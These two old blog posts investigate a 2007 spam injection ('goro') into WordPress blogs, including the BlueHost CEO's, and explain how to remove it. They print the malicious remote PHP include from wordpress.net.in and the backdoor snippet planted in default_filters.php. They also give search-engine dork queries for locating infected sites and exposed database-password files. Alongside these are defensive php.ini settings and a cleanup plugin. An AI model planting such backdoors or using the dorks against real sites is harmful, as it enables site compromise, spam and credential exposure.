Kakkoi » cloacking

Matt Heaton BlueHost HostMonster CEO Official Blog Hacked

Avice De'veréux — Sat, 01 Dec 2007 09:55:53 +0000

Dec 11 2007 - Matt Heaton Blog’s has been cleansed. ATM he’s using latest version of WordPress (2.3.x). And also most of the blogs lists in this articles has been upgrade.

Jan 26th, 2008 - Seem like bluehost engineer did a bad job at cleaning, the goro spam is back.

Just after the recent issue on wordpress.com.cn now there is new wordpress imitater. A remote spamware injection by wordpress.net.in

I was reading one of Matt Heaton posted 2 days ago when I found bunch of spamsware link on his wordpress footer.

Matt’s is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to howardowens.com/?order=XX page.

Lookup for howardowens.com

The below diagram explained the lookup results for howardowens.com. click on the image to enlarge.

Surprisingly the spammer website is also host by bluehost.com (69.89.16.0/20,74.220.192.0/19 ,69.89.16.4 -> box183.bluehost.com).

Tracking the spam sources.

Viewing mattheaton.com html sources I found some hint and start searching for xanax intext:id=\”goro\”. Google return 2 results for this query.

1. Wordpress Support: php get footer adding spam code?
2. elijahzarwan.net: div id=”Goro” (nice headline)

Both site suggest same type of php injection methods
include('http://wordpress.net.in/statcounter.php');

The statcounter.php is just normal text/plain full with spam links. The spam content on Matt Heaton blog is randomly generate from http://wordpress.net.in/[random]/ random = 1 - 9.

Raw whois for wordpress.net.in

Domain ID:D2500581-AFIN
Domain Name:WORDPRESS.NET.IN
Created On:22-Apr-2007 12:01:55 UTC
Last Updated On:22-Jun-2007 02:26:40 UTC
Expiration Date:22-Apr-2008 12:01:55 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. dba PublicDomainRegistry.com (R5-AFIN)
Status:OK
Registrant ID:DI_4275224
Registrant Name:Mick Jagger
Registrant Organization:N/A
Registrant Street1:1 Red Square
Registrant City:Moscow
Registrant State/Province:Massachusetts
Registrant Postal Code:123592
Registrant Country:RU
Registrant Phone:+007.7581235641
Registrant Email:mkk.goro@bk.ru
Admin ID:DI_4275224
Admin Name:Mick Jagger
Admin Organization:N/A
Admin Street1:1 Red Square
Admin City:Moscow
Admin State/Province:Massachusetts
Admin Postal Code:123592
Admin Country:RU
Admin Phone:+007.7581235641
Admin Email:mkk.goro@bk.ru
Tech ID:DI_4275224
Tech Name:Mick Jagger
Tech Organization:N/A
Tech Street1:1 Red Square
Tech City:Moscow
Tech State/Province:Massachusetts
Tech Postal Code:123592
Tech Country:RU
Tech Phone:+007.7581235641
Tech Email:mkk.goro@bk.ru
Name Server:MKKG98981.MERCURY.ORDERBOX-DNS.COM
Name Server:MKKG98981.VENUS.ORDERBOX-DNS.COM
Name Server:MKKG98981.EARTH.ORDERBOX-DNS.COM
Name Server:MKKG98981.MARS.ORDERBOX-DNS.COM

Note: The registrant address on 1 red square is a famous restaurant in Moscow.

Its pretty obvious that wordpress.net.in belong to registrar in India.

Live example wordpress.net.in injection

Google query for warning “[function.include]” allintext: “wordpress.net.in” . Used fiddler or any http-inspector to trace the full header request.

1 Evan Morris: Wordpress 2.0.6 | url | screenshot
2 carwax: Wordpress 1.5.2 | url | screenshot
3 aabenthus.biz: Wordpress 2.0.x | url | screenshot
4 mythinger.com: Wordpress 2.0.2 | url | screenshot
5 classicalanglican.net: Wordpress 2.0.2 | url | screenshot
6 echo9er.net: WordPress 1.5.1 | url | screenshot
7 boyarick.com: Wordpress 2.0.2 | url | screenshot

Google Directory search for class-mail.php

Search for class-mail.php in open directory (public).
“parent directory” class-mail.php -html -htm –php -shtml -md5 -md5sums

jean-cyril.com - wp-includes · spams link redirect to www.901am.com/?page=2157. jean-cyril.com has wp-info.txt inside his wp-includes directory. This text files hold unserialize database password and stuff.
floaridablog.org - wp-includes · spams redirect to communications.uml.edu/sunrise/?id=1076 (University of Massachusetts Lowell) the offending spams page has been removed by UML maintainer.

Hiding from search engine Spiders

First, I did some more comparative search at archive.org for howardowens.com and mattheaton.com. It turn out both of this sites has been stop from IA Archiver few months before the spams start showing on their footer. You will need to check howardowens index on archive.org so you can understand my suspicious.

http://web.archive.org/web/*/http://www.howardowens.com
http://web.archive.org/web/*/http://www.mattheaton.com

Out of boredom I cloaked myself as the following agents.

Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com
Mozilla/2.0 (compatible; Ask Jeeves/Teoma) - 65.214.44.204 - egspd42002.ask.com
Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com

Not much change on both of these sites. Then I read the status header, it return 404 instead of 200. Nice tricks for stopping crawler & spider from spying their joy-ride-spamhouse.

Summary

bits & bytes from this accident we knew that

Most of the site inject are running on wordpress 2.0.6 & below
allow_furl_open is set to true for this injection to work
Most of the blogs owner is unaware about the spams links (cloacking)

Checkout Murray access log, it will give you some ideas with the remote injections methods.

Update

Dec 03 2007: All the spams link to howardowens.com page has been removed. I havent talk with howardowens but I assume howard’s site is being injected the same way like Matt Heaton blog.
Dec 04 2007: Mattheaton.com has a minor update, the spams now inject on both header and footer.
tangonoticias.com:7070/d_pill/577.html.
As tangonoticias.com is running on Joomla CMS they create a static “Wordpress” on port 7070 (Real Network Server & RSTP Port). This is probably a work of different attacker, taking advantage of Matt heaton blindspot. Google Cache (Nov 12)
Dec 11 2007: Matt heaton has been purified. He’s now using latest version of Wordpress (2.3.1). You can still view it on cached thought & screenshot.

How to Removed wordpress.net.in Spam Injection
Jan 31st, 2008 - Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II

How to remove wordpress.net.in spams

Avice De'veréux — Fri, 30 Nov 2007 09:06:54 +0000

I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’s a backdoor (wordpress.net.in). There is no class-mail.php in WordPress except class-phpmailer.php. So don’t get confuse by it.

Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes.

Workaround

For temporary disable remote include in php.ini settings.

;;;;;;;;;;;;;;;;;;
; Fopen wrappers ;
;;;;;;;;;;;;;;;;;;

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = off
allow_url_include = off

Check your .htaccess for suspicious redirect.
Find class-mail.php inside “*/wp-includes/” directory and removed it.

Find the following code inside “*/wp-includes/default_filters.php” and removed it

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16<>b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
if(sizeof($wparr)>0){
echo "!div id=\"goro\"!";
foreach($wparr as $k=>$v){
echo "“.ucwords($v[’key’]).”\n”;
if($i++==$inum) break;
}
echo “!/div!”.$_footer;
}
}

Robots.txt Exclusion

Optional - Prevent googlebot from indexing the static spam page.
Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”. Add the following code.
```
User-agent: Googlebot
Disallow: /*?*
Disallow: /*?
```
Refer robots.txt.

Possible WordPress class (suspicious) files that would be tempered

Md5 checksum the following files, compare it with official versions from WordPress Release Archive.

The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities. Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade.

Dec 13, 2007

I just notice this recently. You’ll need to check your site HTTP Header. Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500). My guess is they did this to cloak from being crawl by search engine spiders. If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner.

Check your website status header, try cloak your browser (UA) as Search Engine Crawler. The following screenshot will show you how to setup this at web-sniffer.net.

This methods may not work if the cloaking scripts used IP base tracking. So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver).

Firefox Browser

You can also override your useragent string with firefox ↓.

about:config → general.useragent.overide = ‘ua strings‘

Wordpress.net.in Backdoor

Extra info

Wordpress.net.in Doorway

Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/

Backdoor Files

inside wp-includes directory.

compat.php - (replace with latest version)
class-mail.php delete

scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins. Then add the following code to disabled directory listing (prevent informations leak & Directory search index).

Options -Indexes

Wordpress.net.in New Partner

Feb 23th 2008, We found a similar signature like wordpress.net.in at qwetro.com (germany). Probably from the same attacker with different agenda.

removes malicious create_function wp_head filters

This are fixes for wordpress.net.in spams header injection.

/**
 * Remove create_function action hook
 * append on wordpress wp_head filters
 *
 * @author Avice De'véreux <ck@kaizeku.com>
 * @copyright Copyright (c) 2006 Avice De'véreux
 * @version 1.0
 * @license http://www.gnu.org/licenses/lgpl.html GNU Lesser General Public License
 * @link http://blog.kaizeku.com/wordpress/goro-spam-injection-wp-head-patch/
 */
function remove_create_function_action()
{ global $wp_filter;

	$action_ref	= 'wp_head';
	$filter 	= $wp_filter[$action_ref];
	$_lambda	= array();

	foreach(range(1,10) as $priority){

		if (isset($filter[$priority]))
		{
			foreach($filter[$priority] as $registered_filter ){

				$callback = (string) $registered_filter['function'];

				if ( preg_match("/lambda/", $callback) ) {
		 	 		$_lambda[$priority][] = $callback;
				}
			}

		}
	}

	if ( count($_lambda) >= 0 ){

		foreach($_lambda as $priority => $callback) {
			if ( has_filter($action_ref,$callback) ){
				remove_filter($action_ref, $callback, $priority, 1);
			}
		}
	}
}

add_action('init','remove_create_function_action');

The plugin’s can be download at Kaizeku Ban, goro spam injection fixes